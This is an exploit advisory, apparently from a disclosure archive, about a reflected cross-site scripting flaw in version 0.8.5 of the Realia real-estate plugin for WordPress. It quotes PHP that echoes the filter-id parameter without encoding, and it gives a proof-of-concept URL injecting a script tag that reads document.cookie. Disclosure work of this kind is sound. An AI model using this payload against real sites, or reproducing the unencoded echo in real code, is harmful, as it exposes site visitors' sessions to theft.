WordPress Realia plugin version 0.8.5 suffers from a cross site scripting vulnerability.
f3fa9d3a133689c0071c10d43cc2e7680a1306c191b8cbd5fb9ecfa0a73fcd41
Exploit Title : wordpress plugin 'Realia' (real estate solution) multiple XSS Vulnerability
Author : WICS
Date : 03/06/2016
Software Link : https://wordpress.org/plugins/realia/
Tested Version: 0.8.5
Overview:
Realia is wordpress plugin which provides functionality of real estate service like search and sale of property.
this script is having property search form which is vulnerable to Cross Site Scripting attack
template codes inside directory realia\templates\widgets\filter-fields are to display search form on user end.
scripts (inside directory realia\templates\widgets\filter-fields) are not encoding user supplied data in GET method variable before printing to search page and
causing XSS vulnerability.
for example in id.php, from line number 7 to 9, input text field code is given below
<input type="text" name="filter-id" class="form-control"
<?php if ( 'placeholders' == $input_titles ) : ?>placeholder="<?php echo __( 'Property ID', 'realia' ); ?>"<?php endif; ?>
value="<?php echo ! empty( $_GET['filter-id'] ) ? $_GET['filter-id'] : ''; ?>"
on line number 9, GET method variable filter-id value is getting pass directly and no XSS filter to clean the data which results in XSS
POC
http://127.0.0.1/wordpress/properties/?filter-contract=RENT&filter-id="><script>alert(document.cookie);</script>&filter-location=&filter-property-type=&filter-amenity=&filter-status=&filter-contract=&filter-material=&filter-price-from=1337'&filter-price-to=&filter-rooms=&filter-baths=&rent_filter-beds=&filter-year-built=&filter-home-area-from=&filter-home-area-to=&filter-lot-area-from=&filter-lot-area-to=&filter-garages=